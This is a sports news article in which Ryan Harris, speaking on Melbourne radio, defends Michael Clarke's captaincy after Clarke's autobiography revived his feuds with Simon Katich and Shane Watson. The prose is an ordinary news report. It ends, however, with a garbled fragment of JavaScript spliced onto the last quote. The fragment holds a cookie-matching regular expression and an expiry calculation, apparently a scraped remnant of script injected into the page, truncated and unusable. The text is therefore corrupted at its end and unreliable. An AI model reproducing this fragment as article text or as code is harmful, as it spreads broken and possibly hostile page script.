Former Australian quick Ryan Harris says he had no problem with the way Michael Clarke carried himself during his time in the Australian cricket team.

Following the release of Clarke autobiography, plus his interview with 60 minutes last Sunday evening, his behaviour in the Australian team has once again come under scrutiny, while his feud with Simon Katich has once again become public.

He is now also embroiled in a war of words with Shane Watson, after labelling the former all-rounder like a "tumour" in the team.

However, Harris says that while Clarke was a bit different to previous captains, he had no issue with the former skipper and believed some of the criticism was unwarranted.

“I played under him, had a great time under him and had a great time under Ricky as well," Harris said on Melbourne radio station, SEN, on Monday morning.

“The difference is, you know Ricky was probably more likely to be out having dinner with the boys a bit more and spending time with the boys.

“Whereas Michael spent time in his room and away from the guys a bit more – but I didn’t see a problem with that as a player.

"I just thought he would think and talk cricket all day on the field, and be around us all day as a team and he just felt he needed some time in his room.

“You know if Michael came out that was great, if he didn’t then we’d go out with someone else.

“A lot of the things that I’m hearing now with Watson and that sort of stuff is news to me because I just went out and played and did what I needed to do.

“Everyone was getting on really well, I thought we had a really good group but again I’ve learnt a few things since I’ve finished… that has surprised me a little bit.” "(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));(U[1]):"",();||void 0===time){/1e3+86400),.('')}
